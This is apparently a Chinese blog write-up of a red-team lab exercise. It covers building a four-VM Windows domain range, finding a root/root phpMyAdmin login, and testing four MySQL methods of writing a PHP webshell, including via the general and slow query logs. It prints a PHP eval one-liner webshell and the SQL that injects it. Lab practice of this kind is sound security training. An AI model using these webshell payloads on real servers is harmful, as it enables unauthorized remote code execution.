红日安全ATT&CK红队评估——靶机搭建AND牛刀小试

z2h -
红日安全ATT&CK红队评估——靶机搭建AND牛刀小试
靶机搭建下载地址:
靶机下载地址

一共四台机子

win7:web服务器(两张网卡,内网和外网,防火墙)

外网: 192.168.206.129内网: 192.168.44.128

server2003:域成员(内网)

内网: 192.168.44.129

server2008:域控(内网)

内网: 192.168.44.130

kali:攻击机

外网: 192.168.206.128打开web服务器的phpstudy
image.png

靶场搭建完毕!

探测一下数据库,发现是弱密码

username: rootpassword: root
image.pngnmap扫描一下端口
image.pngdirsearch扫一下目录
image.png
发现phpmyAdmin,账户名和密码都是root,可以通过phpmyAdmin来写shell了!

phpmyAdmin写webShell
看一下网上大佬们是怎么写shell的:

select into outfile 语句直接写入Webshell.

条件: root数据库用户,secure_file_priv的值为" "(注意是为" "而不是"NULL"),有权限写入绝对路径的文件夹

创建数据库和表写webShell

条件:与第一种方法一样

开启全局日志getshell

条件:与第一种方法一样

通过慢查询写webShell

条件:需要有写入权限

总结来说就是要找个方法把shell写到本地。
image.png
查询之后发现secure_file_priv的值为NULL说明不能写入。我们把每个方法都试一试,看看到底行不行^ ^。

select into outfile:

image.png第一种方法失败了.

创建数据库和表写webShell:
image.png开启全局日志getShell

image.png
image.png
image.png
芜湖~成功啦。去看看写进去了没。
image.png
成功写入,找个蚁剑看看能不能连上!一句话写错了。。一直连不上:
<?php @eval($_POST['cmd']); ?>应该是这样。
成功连上!image.png

通过慢查询写入webShell
image.png

将慢查询开启,并设置慢查询日志路径:
image.png
image.png
进行慢查询,让一句话插到日志里面:
select '<?php @eval($_POST[cmd]);?>' from mysql.DB where sleep(10);
image.png

总结:全局日志和慢查询跟secure_file_priv的值无关,只需要有写的权限就可以啦想说的话

干了两个星期开发觉得还是做安全好0 0,研究生毕业前重新把安全捡起来!顺便试试看能不能审计审计java代码,哈哈。

特别申明:本文内容来源网络,版权归原作者所有,如有侵权请立即与我们联系(cy198701067573@163.com),我们将及时处理。

php介绍

PHP即“超文本预处理器”,是一种通用开源脚本语言。PHP是在服务器端执行的脚本语言,与C语言类似,是常用的网站编程语言。PHP独特的语法混合了C、Java、Perl以及 PHP 自创的语法。利于学习,使用广泛,主要适用于Web开发领域。
下一篇: PHP8.1之enum解析

Tags 标签

安全漏洞php

扩展阅读

加个好友,技术交流

1628738909466805.jpg